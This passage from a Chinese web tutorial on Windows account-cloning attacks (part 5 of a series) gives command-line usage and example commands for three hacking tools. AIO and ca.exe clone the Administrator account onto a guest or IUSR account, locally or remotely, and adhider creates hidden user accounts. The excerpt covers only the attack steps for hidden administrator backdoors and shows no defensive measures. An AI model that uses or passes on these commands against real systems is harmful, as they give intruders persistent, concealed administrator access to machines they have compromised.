黑客攻防实战:Windows系统克隆攻击与防范
2008-12-15 13:39:05 来源:WEB开发网核心提示: 4.使用AIO克隆AIO(All In One)是WinEggDrop写的一个把很多小工具功能集成一体的一个“工具”,其中有克隆用户、修改服务的启动类型、删除系统账户、检查系统隐藏服务、端口扫描和端口转发等等,黑客攻防实战:Windows系统克隆攻击与防范(5),使
4.使用AIO克隆
AIO(All In One)是WinEggDrop写的一个把很多小工具功能集成一体的一个“工具”,其中有克隆用户、修改服务的启动类型、删除系统账户、检查系统隐藏服务、端口扫描和端口转发等等。
使用AIO克隆很简单,就是: Aio.exe -Clone 正常账号 要被克隆账户 密码
如: Aio.exe -Clone Administrator IUSR_XODU5PTT910NHOO n3tl04d
这样就可以用IUSR_XODU5PTT910NHOOn3tl04d作为管理员登录了。
如图9所示。
图9
5.使用CA克隆
ca.exe 小榕编写的一个远程克隆账号工具,当然本地克隆也没问题。
用法如下:ca ip地址 管理员用户名 管理员密码 克隆的用户 密码
如:ca 127.0.0.1 administrator 123456 IUSR_XODU5PTT910NHOO 123456
如图10所示。
图10
6.建立隐藏账号
需要使用的工具叫adhider,是锦毛鼠写的一个专门建立隐藏用户的工具。此工具有个缺点,那就是当服务器重启后,用户就隐藏不了,会在用户管理中显示出来。
用法如下:adhider 用户名 密码
如:adhider n3tl04d$123456
如图11所示。
图11
更多精彩
赞助商链接